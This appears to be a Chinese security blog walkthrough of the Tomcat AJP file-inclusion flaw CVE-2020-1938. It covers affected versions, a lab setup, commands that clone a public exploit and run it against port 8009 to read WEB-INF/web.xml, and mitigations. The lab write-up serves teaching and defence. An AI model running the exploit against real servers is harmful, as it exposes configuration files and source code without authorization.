Apache與Tomcat都是Apache開源組織開發的用於處理HTTP服務的項目,兩者都是免費的,都可以做為獨立的Web伺服器運行。
Apache Tomcat伺服器存在文件包含漏洞,攻擊者可利用該漏洞讀取或包含 Tomcat 上所有 webapp 目錄下的任意文件,如:webapp 配置文件或原始碼等。
由於Tomcat默認開啟的AJP服務。埠號為8009,攻擊者可構造惡意的請求包進行文件包含操作,進而讀取受影響Tomcat伺服器上的Web上的任意文件。
Apache Tomcat = 6
7 <= Apache Tomcat < 7.0.100
8 <= Apache Tomcat < 8.5.51
9 <= Apache Tomcat < 9.0.31
虛擬機: centos7 + apache-tomcat-8.5.32
安裝完成後使用下面的命令克隆環境
git clone https://github.com/laolisafe/CVE-2020-1938並解壓Apache
unzip apache-tomcat-8.5.32.zip
在Apache的bin目錄下,添加執行權限,我這裡給全部權限
啟動Apache,注意有先安裝java環境
sh startup.sh
查看埠,8009埠是開啟的
漏洞利用#
下載exp
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi,我們這裡讀取WEB-INF/web.xml文件
python CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f WEB-INF/web.xml 192.168.248.129
五、解決方案:
1、臨時禁用AJP協議埠,在conf/server.xml配置文件中注釋掉2、配置ajp配置中的secretRequired跟secret屬性來限制認證。
*參考來源:網絡
PS:如果覺得本篇文章對您有所幫助,歡迎關注!幫忙點個讚,轉發一下 分享出去吧,有問題可以公眾號回復私聊小編,看到就會及時回復,也可加小編微信入群交流哦~~!
◆Burp Suite | captcha-killer 識別圖片驗證碼
◆Burp suite | chunked-coding-converter插件
◆CVE-2020-3452:Cisco_ASAFTD任意文件讀取漏洞